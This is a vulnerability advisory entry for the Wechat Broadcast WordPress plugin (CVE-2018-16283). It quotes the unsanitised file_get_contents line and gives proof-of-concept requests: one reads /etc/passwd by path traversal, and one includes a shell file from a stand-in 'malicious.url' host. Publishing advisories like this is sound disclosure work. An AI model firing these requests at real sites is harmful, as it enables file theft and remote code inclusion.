Lucene search
Jonas LejonWPVDB-ID:3E434618-087B-4EF9-A63B-8B378C748390HistorySep 19, 2018 - 12:00 a.m.
Wechat Broadcast <= 1.2.0 - Local/Remote File Inclusion
2018-09-1900:00:00
Jonas Lejon
wpscan.com
5
0.257 Low
EPSS
Percentile
96.7%
This bug was found in the file: /wechat-broadcast/wechat/Image.php echo file_get_contents(isset($_GET[“url”]) ? $_GET[“url”] : ‘’); The parameter “url” it is not sanitized allowing include local or remote files To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application.
PoC
Local File Inclusion POC: GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=…/…/…/…/…/…/…/…/…/…/etc/passwd Remote File Inclusion POC: GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url= http://malicious.url/shell.txt
| CPE | Name | Operator | Version |
|---|---|---|---|
| wechat-broadcast | eq | * |
Related
exploitpack
exploitpack
WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
2018-09-19 00:00:00
osv
osv
CVE-2018-16283
2018-09-24 22:29:00
nvd
nvd
CVE-2018-16283
2018-09-24 22:29:00
checkpoint_advisories
checkpoint_advisories
Wechat Brodcast Project Directory Traversal (CVE-2018-16283)
2020-06-05 00:00:00
nuclei
nuclei
WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
2021-05-27 03:15:53
wpexploit
wpexploit
Wechat Broadcast <= 1.2.0 - Local/Remote File Inclusion
2018-09-19 00:00:00
patchstack
patchstack
cvelist
cvelist
CVE-2018-16283
2018-09-24 22:00:00
prion
prion
Directory traversal
2018-09-24 22:29:00
cve
cve
CVE-2018-16283
2018-09-24 22:29:00
exploitdb
exploitdb
WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
2018-09-19 00:00:00
openvas
openvas